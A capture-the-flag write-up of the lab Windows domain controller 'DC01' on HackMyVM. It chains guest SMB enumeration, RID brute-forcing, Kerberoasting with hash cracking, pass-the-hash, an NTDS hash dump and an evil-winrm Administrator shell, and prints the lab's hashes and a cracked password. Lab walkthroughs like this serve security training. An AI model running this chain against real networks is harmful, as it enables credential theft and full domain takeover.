DC01 – HackMyVM Link to heading
- OS: Windows
- Difficulty: Easy
- Platform: HackMyVM
Summary Link to heading
“DC01” is an easy machine from HackMyVM platform that introduces some Active Directory concepts. We are allowed to enumerate users as a guest user. We can then use GetUserSPNs tool from Impacket to obtain hashes for some users and crack them. We are then able to obtain the passwords for 1 user that has access to some backup shared resources. These resources contain hashes for some users. One of them work for a user, and this final user has maximum privileges on the target machine, which allow us to gain total control of it.
User Link to heading
Starting with an Nmap scan shows multiple ports open: 53 Domain Name System (DNS), 88 Kerberos, 135 Microsoft RPC, 389 Lightweight Directory Access Protocol (LDAP), 445 Server Message Block (SMB), 5985 Windows Remote Management (WinRM); among many others:
❯ sudo nmap -sS -p- --open --min-rate=5000 -n -Pn -vvv 10.20.1.140
Applying some recognition scans with -sVC flag to these ports show:
❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49670,49677,49694 10.20.1.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-17 20:23 -03
Nmap scan report for 1.20.1.140
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-18 03:23:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:43:08:EC (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-10-18T03:24:23
|_ start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:43:08:ec (Oracle VirtualBox virtual NIC)
|_clock-skew: 3h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.40 seconds
We are against an Active Directory environment.
Using NetExec against SMB service shows a domain:
❯ nxc smb 10.20.1.140
SMB 10.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
We have a domain: SOUPEDECODE.LOCAL.
We are allowed to log in as guest user:
❯ nxc smb 10.20.1.140 -u 'guest' -p ''
SMB 10.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
We are also not able to see any interesting shares (using --shares flag):
❯ nxc smb 1.20.1.140 -u 'guest' -p '' --shares
SMB 1.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 1.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB 1.20.1.140 445 DC01 [*] Enumerated shares
SMB 1.20.1.140 445 DC01 Share Permissions Remark
SMB 1.20.1.140 445 DC01 ----- ----------- ------
SMB 1.20.1.140 445 DC01 ADMIN$ Remote Admin
SMB 1.20.1.140 445 DC01 backup
SMB 1.20.1.140 445 DC01 C$ Default share
SMB 1.20.1.140 445 DC01 IPC$ READ Remote IPC
SMB 1.20.1.140 445 DC01 NETLOGON Logon server share
SMB 1.20.1.140 445 DC01 SYSVOL Logon server share
SMB 1.20.1.140 445 DC01 Users
There is a backup directory, but we are not able to read it.
If we use --rid-brute to check for users we can get something:
❯ nxc smb 1.20.1.140 -u 'guest' -p '' --rid-brute
SMB 1.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 1.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB 1.20.1.140 445 DC01 498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 1.20.1.140 445 DC01 500: SOUPEDECODE\Administrator (SidTypeUser)
SMB 1.20.1.140 445 DC01 501: SOUPEDECODE\Guest (SidTypeUser)
SMB 1.20.1.140 445 DC01 502: SOUPEDECODE\krbtgt (SidTypeUser)
<SNIP>
SMB 1.20.1.140 445 DC01 2162: SOUPEDECODE\PC-90$ (SidTypeUser)
SMB 1.20.1.140 445 DC01 2163: SOUPEDECODE\firewall_svc (SidTypeUser)
SMB 1.20.1.140 445 DC01 2164: SOUPEDECODE\backup_svc (SidTypeUser)
SMB 1.20.1.140 445 DC01 2165: SOUPEDECODE\web_svc (SidTypeUser)
SMB 1.20.1.140 445 DC01 2166: SOUPEDECODE\monitoring_svc (SidTypeUser)
SMB 1.20.1.140 445 DC01 2168: SOUPEDECODE\admin (SidTypeUser)
After applying some filters with grep, we can save the potential users with:
❯ nxc smb 1.20.1.140 -u 'guest' -p '' --rid-brute | awk '{print $6}' | grep 'SOUPEDECODE' | grep -vE 'Enterprise|Domain|Schema|Group|Read-only|Cloneable|Cert|Key|RAS|Protected|Allowed|Denied|DnsAdmins|DnsUpdateProxy|guest:' | awk -F '\' '{print $2}' > potential_users.txt
Since we were able to enumerate users with NetExec as guest user and we got potential users, I will attempt to see if we can extract hashes from users using GetUserSPNs.py from Impacket:
❯ impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users.txt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
We get KRB_AP_ERR_SKEW error.
To avoid this error we can run sudo ntpdate -s 10.20.1.140 before the command. Additionally, since the list is too big I will divide it into 2 using sed. Since the user file is 1069 lines, we delete from line 600 to 1069:
❯ sed '600,1069d' potential_users.txt > potential_users_part1.txt
and then just delete the first 599 lines running sed again:
❯ sed '1,599d' potential_users.txt > potential_users_part2.txt
Then, we can request the hashes running:
❯ sudo ntpdate -s 10.20.1.140 && impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users_part1.txt -outputfile hashes_found1
<SNIP>
❯ sudo ntpdate -s 10.20.1.140 && impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users_part2.txt -outputfile hashes_found2
Append both results into one file using cat:
❯ cat hashes_found2 >> hashes_found1
and we have 5 hashes for 5 different users:
❯ cat hashes_found1 | grep -vE 'PC\$|PC-'
$krb5tgs$18$krbtgt$SOUPEDECODE.LOCAL$*krbtgt*$4ecd7ed4b5252754de6b967d$d1a00b576eedfa102b4650a56a55e0be9b90df0e3c3bb1d8565a5c38b3103d6a96fdf67d5afb98210b5789ce6ce137beea723d9fdee227e169e2720e8322d3f3b9c01828aae3d9184fd309bd6c08ff3479a9d4754a636d8bdb38729031ed50529b2cc1a6f8c0e9dc08b6cca2477bbead25a82425d7153fee9c46b92047aa1617b45c37fd4d40130663fc6363218f1f806a7a6ebcab0a0974bd6dc9e4ded6dd25abe2286aaec7dafda6e77981470138dac7c8e25d18d4c24578b0275c6039bd95a000bad7f4d01d92c385cfb5cf75d06afa36a0fa0a06de7b5bc2aba9d576de44482037f958dcf7643da5278a2a74900a39ec2629b8fab1e5301b8103f25ce2f0805a5b21fb99e49058219e97c5d32784253277bf978a61bc392e08c7fddab9d5004400bc264aa67aa446ba186f7d74c7e28872e881bf6b6dbd6671e973e588c3aef5ab8a2a54b51cf22f72fb2b787757aa975bc1f13c53c45ca6e72bd6d0f69a1c24ae445daef205bd676ad56f56a7598ad41024caefab2f274b6eaabf47680542bf0a8408c05fc7c08bcb6f06b413b598c053d5485f1443226486ccd4524a06f4550cd25ad869e6a03ea89a5823b577c91de6e43975c86898618a60cdd0270ca868deb92fcbcb6d26f0a081c8174c8a00181933eb86cce901f3103efe9de62639cab715729c935396ab8e51df592192aa24fc22843571ec8ed6e473a991f01bbba8503970675350ff4c8365a371894e3b35c025ecc1834d3e7f7d66e452478c265d79c1a037066089f157deb60e9929440249b0614ea6b72933c4c8213a870661a14cdfb08f4e6544d4c7393188cc030a7a8b920968e8a3ba70c99c97b607e8b90eb39454dc0b832866623b8b29e663c55aa307690117c5661fdf583955e734f43818f54070792a6cc7d4de9be7728c8fee3e40308bbc21e08b2a85fdacaf040e79f54f8118c726d5de2e0d800d2daaa69dd08bb1a558214f77cd901db13728921e9e22f46b9bd52682b4601439b0733e72b4ed637f45d5bd5413828d630a2d8380d021dc3863768db46be1122c1454f5f25542c0ed349c5d42269684aef0864012d31c29ea4ff8f4cd82f10fb6416f93f16a5f631153496077d044b5d8ecca61c37cecdcea245280adb5822ef5b366534311ffd11e37f47a973d555824d93ba04832d21de560ec16df8e2fb3e913703982154e81e1c4a57d8f54d6f7d47ad47fe3bf4f16e4a751d0c5f23377b558b33ce9b857c46ba6f8c426778f45dfa03a3ad5541451ee5418487af853f9e93e39f5edecbd29805edf74558eaee2fd6fccb9b89f0666a0500d4792effa68a24679295b656233a14633305be94146632eb53cc392ca161053d9c142d388c540d4c10a52768fe60900567656df96812eba72bef3c8bd92d40e138eff49544c7d07e93bc946e17610b39f90e30cb220c9e8b6188587b76906eb4c0b82dde0341127067a12da22ef5787247f0cf1805007577bbd14427327db97
$krb5tgs$18$DC01$$SOUPEDECODE.LOCAL$*DC01$*$bf907a7ce2b3ef5e3e4a7cfd$4e51f57152ccc7fb413a043a227bee411f211156cdce35fe261d3b223e384d447cf3219d03c906a0918232c968b024899212c90055f18d6d3c7edf7154e30845184b3a923c1a2aee0daaf97faeaa80c213c0ead533337ad09b35d19c19b17d99cc1b0a93d5f2c225bf0d055c0946700cf9c47d4c3337c8dbcf73824532c0f021d13d678c9eae1e91143087c7893c5a3b71f3a44398906c6f6852fb21286543bc912a5c0214bc62e7834205358790480b97c2938750d97b88ff663c3a295b5eb35e52b9a7d014573590699e6be20c83b42b2df3b09e79adeaecb526740d1d82cf4b053a9a399ed077849152be86be3d27466f3b5bdd228ab7932d84d182da906314fb22516fbcb650886280d7b2908cf70673c5d2c7508816a938f7fdde11a2146bc0282b36cddb9e736e5ed9b0cd3948d4ca89f3c83c686967e9399a0ebc23a9c111eb4e0fabf253cde5ac260d40f6d8ae2f14c40e3b21ef8010c54969e418d88e6a397b9c276bef9882ba92669583161ac9840a6d0bed1d2c4292a6960b7094da33baa08f26ccd8d3e8302a540fbd4301af7ede7e8c981571086559840512ff691b81b9c271caf5029200ce6e459df3e2a7ecb1aeffd9aec40613e2982d81cebedc94c55ae7df5592a3c6b79f732d47e6dc08e825885e9f9999dd258321a6369b56f148fbe2009f69874b06c40d2a3dea853d7cfadc63cd88da83598772126c0f852e95c1307a1987a6f950929625dae4777d10ae7d47a463d42d0b41557aa2314d27839bd6e64be7ff265a1375df00f26fcc10080bcbf862ab02de03b37e1d9271413c72f80e713a8b3ef57bbe72309d7f8c143e9467e5dbca69b9c1cf7f0f4e52aeed4be66b36534af835ee00d50e885290d0c4602eaecbd3cf6be43c8ec693968ca8fcd57a16faac6823ea2dd7bc32842fada434052835800c8f6a3cd7d8789fc499a50f206c2eff715fc3b481a77877911d18f06d97f392f8b65c3bdfb27bba4ff294aa6495d87ec7bcac4a58eeb401d5ef30a3fd86b5de3f18c6bd2693fbf7429fffb5b3383e3d3b505aaae7ff501ee2abf2d39bbd27285f197300eb6eb37d83e00a66ee46dae18ec30d295b2573302bb35b9f9d3be486d7dd11c200e5a7d96cdfcd801f60c335ae811266bbd13ef3986954f6f36053529161a560c52bc452f63ee849293a70cbef0053affff78b133055b352a918549fcea331bb57f69b8eac75f3ddc522702594ea83bd025f48be24b25cb6532794b169c70247d12fd3fef7166b2e9b2974d3a65e7f7b56977b94ec48e72b9e6f406a2e17869c69e3c1b75c80c7cc3b92d66ce1ac14aa3649cf2f6a7ee7849a87e988bbf8d8010fcda76a84b20495fe8df95766086695356bcaa90392fd2fc3a15923f0c6ed2bd5b458f6d119f1b6a14e56c0d915db35f31b4a9cdb375b99b4fce20c55e10d4377
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$file_svc*$73c009074156218414b4d20086bc2e38$53b4c659dac28bcd45263758813a4ac78a88190f35b5ea437e74aff3fe36fcdc8e916e30034214ff3fdbd5c92edf3eaeffec2e6337c585b72ae4d579a9c71da0142a04fe3747885a9f5316043030ca67e3c5788dcfa1ccb1cdd7eb345d2286676fee78588650aef8ec9fad25ab200e5ea850bafcf85e964513faddaa3fe5290cc2f96a2814b128e7a5455471dd95ad790a004f718fd551c2efa12e0fe38b1bdd626a08903ebba8cec1eaeb9dc3dfea1840a352875c0e8b0147f7df6f0d11fbec2d3de81c9b1a2784ee430bef5c034d37c603458f3806a44848351f4527983958afff11364f872039ac0c13d5fb9ed7c0284dbf5d53b557c2dd9c721dcdebf23a23a4115d6d76432a26ea0ffa38675375f6cda431fceaf5147109d9554c2217985e0411c5524a46417c6b03ecb3c041458d877bc6f2bbf5fb22007b0bce454d74ce181c21e376366fa4ade935ec36e11286538b9e15e4f383c15dce3bc251b336c04ae80e037d500cb4faebdec38249254011e6343a2fb87e55302a16d3b98b2e01b41f88628fe49e9b77ec55b6f62bd116e9061449400c7b5892da1af4d90c32b9c92e1104911c2f3425372729855cbdbb042b08da4843605bc2a8bf3ee95e3508e46a41c9777060c8d594bdcdc2abe37dbf05cae6128d7709c3b643c1f7432b3ae75e5d00bbc03216c9427851da6a66a8494f0c28bf82e19faaddef770aca0ffc0e2e6d89d6764089956c412a3d1707272b67557387dbdb71a5e8ddc0af6a7ddfe56e49f71b9c2bbc718ecf5a7bfdd7dd3e1074e49d6ad4962e19a0a1042cfb3ea35a335f1303d33191170e40d2132d0d3b2f50127a71ecb8ff06393f49799c950f074c94a74df665b58f194a61492520ba341507790087cd9d9402f4d72b30cd8da5024b4a88dc4ebe4e5d6b6f05d573aa3b1010ef27fe35ca739a8660053a88df878a76124a97bcc855672ae6b3ab943d79c694eb91f9137104886b734e3f77bb9bb8dabd2621c1c0a477d58717ea144a719cd7c66aacae4df9de35f0516d8f0141ed9c4cf6ff88c7345c47c180e7d662999371fce22745b5c3b9384bf2040672bcff4fb6ceb3cf32a8a26c7635e5568c727b8bc52089562cb8e8fab20ed2b4c98cd9afb46a693df24fe0eae7a500a34c97bdc9b8f73408fe50984a36ce072657aac8840287199fa4d1819dd6ee691106306d1a4418c72d5e8c26c3d476c74c8e3cdcffb11693c011c4d95ba57ffa6e1a8e594170719f142f65c15beb4ac9bf2f377de7c6cf36bba2b0593594323f18913d340bfba8070e72eef637d3dc861f63e4fa385df18a3f0240973d46b960aaabd18e4316955099884a83b67289c20385d78d0cb7933d2f3d486c0d0736f139e08e57831fdd0b43efe88abfc676583cab1a4b1f9566f1027a6d543d086d4d927bf632ad34d2dc5d924ed1abb26e
<SNIP>
I filter some hashes and exclude some for PC users
❯ cat hashes_found1 | grep -vE 'PC\$|PC-' > filtered_hashes
and attempt to crack them through a Brute Force Password Cracking along with rockyou.txt dictionary and JohnTheRipper tool:
❯ john --wordlist=/usr/share/wordlists/rockyou.txt filtered_hashes
Using default input encoding: UTF-8
Loaded 15 password hashes with 15 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123!! (?)
1g 0:00:01:07 DONE (2024-10-17 21:40) 0.01480g/s 212311p/s 3131Kc/s 3131KC/s 0841079575..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We get a password: Password123!!.
The password is for one of these users:
❯ cat filtered_hashes | awk -F '$' '{print $4}' | tr -d '*'
krbtgt
DC01
file_svc
WebServer
DatabaseServer
FileServer
MailServer
BackupServer
ApplicationServer
PrintServer
ProxyServer
MonitoringServer
CitrixServer
firewall_svc
backup_svc
web_svc
monitoring_svc
So we save them:
❯ cat filtered_hashes | awk -F '$' '{print $4}' | tr -d '*' > potential_hash_user.txt
We check if this password works for one of the users with NetExec:
❯ nxc smb 10.20.1.140 -u potential_hash_user.txt -p 'Password123!!' --continue-on-success | grep -v 'Guest'
SMB 10.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:Password123!! STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\firewall_svc:Password123!! STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\backup_svc:Password123!! STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\web_svc:Password123!! STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\monitoring_svc:Password123!! STATUS_LOGON_FAILURE
and we have the password for file_svc user.
NT Authority/System - Administrator Link to heading
This user cannot log in via WinRM, but if we check what resources can this user read, we can see it can read backup shared resource in SMB:
❯ nxc smb 10.20.1.140 -u 'file_svc' -p 'Password123!!' --shares --filter-shares READ
SMB 10.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
SMB 10.20.1.140 445 DC01 [*] Enumerated shares
SMB 10.20.1.140 445 DC01 Share Permissions Remark
SMB 10.20.1.140 445 DC01 ----- ----------- ------
SMB 10.20.1.140 445 DC01 backup READ
SMB 10.20.1.140 445 DC01 IPC$ READ Remote IPC
SMB 10.20.1.140 445 DC01 NETLOGON READ Logon server share
SMB 10.20.1.140 445 DC01 SYSVOL READ Logon server share
We then use smbmap to view what is in this shared resource:
❯ smbmap -H 10.20.1.140 -u 'file_svc' -p 'Password123!!' -r 'backup' --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.20.1.140:445 Name: 10.20.1.140 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup READ ONLY
./backup
dr--r--r-- 0 Mon Jun 17 13:41:17 2024 .
dw--w--w-- 0 Mon Jun 17 13:44:56 2024 ..
fr--r--r-- 892 Mon Jun 17 13:41:23 2024 backup_extract.txt
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users NO ACCESS
[*] Closed 1 connections
We have a file named backup_extract.txt.
Download this file with smbmap and --download flag:
❯ smbmap -H 10.20.1.140 -u 'file_svc' -p 'Password123!!' --download 'backup/backup_extract.txt' --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: backup\backup_extract.txt (892 bytes)
[+] File output to: /home/gunzf0x/OtherMachines/HackMyVM/DC01/content/10.20.1.140-backup_backup_extract.txt
[*] Closed 1 connections
Reading its content show a series of NTLM hashes.
❯ cat 10.20.1.140-backup_backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
Therefore, since we have a list user, we can attempt a Pass The Hash attack with these hashes since one of them might work. Save these hashes:
❯ cat 10.20.1.140-backup_backup_extract.txt | awk -F : '{print $4}'
c47b45f5d4df5a494bd19f13e14f7902
406b424c7b483a42458bf6f545c936f7
48fc7eca9af236d7849273990f6c5117
e41da7e79a4c76dbd9cf79d1cb325559
46a4655f18def136b3bfab7b0b4e70e3
46a4655f18def136b3bfab7b0b4e70e3
8cd90ac6cba6dde9d8038b068c17e9f5
b8a38c432ac59ed00b2a373f4f050d28
4e3f0bb3e5b6e3e662611b1a87988881
48fc7eca9af236d7849273990f6c5117
❯ cat 10.20.1.140-backup_backup_extract.txt | awk -F : '{print $4}' > leaked_hashes
Then, use again NetExec and found hashes to see if one of these hashes works for any of the original users found:
❯ nxc smb 10.20.1.140 -u potential_users.txt -H leaked_hashes
SMB 10.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\Administrator:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\Guest:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
<SNIP>
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\WebServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\DatabaseServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
This worked for user FileServer$. Additionally, I can see Pwn3d! message through SMB service, which means FileServer$ user has maximum privileges on the machine.
Therefore, we could use this user to dump all the hashes in the system with NetExec as well. In this case I will only dump the Administrator hash user:
❯ nxc smb 10.20.1.140 -u 'FileServer$' -H e41da7e79a4c76dbd9cf79d1cb325559 --ntds --user Administrator
SMB 10.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
SMB 10.20.1.140 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.20.1.140 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d40c3a9a98889f5cbb778b0db54a2f:::
SMB 10.20.1.140 445 DC01 [+] Dumped 1 NTDS hashes to /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds of which 1 were added to the database
SMB 10.20.1.140 445 DC01 [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.20.1.140 445 DC01 [*] cat /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.20.1.140 445 DC01 [*] grep -iv disabled /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds | cut -d ':' -f1
And use this hash to connect to the victim machine with evil-winrm through WinRM service:
❯ evil-winrm -i 10.20.1.140 -u 'Administrator' -H '88d40c3a9a98889f5cbb778b0db54a2f'
Evil-WinRM shell v3.6
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
soupedecode\administrator
GG.
~Happy Hacking.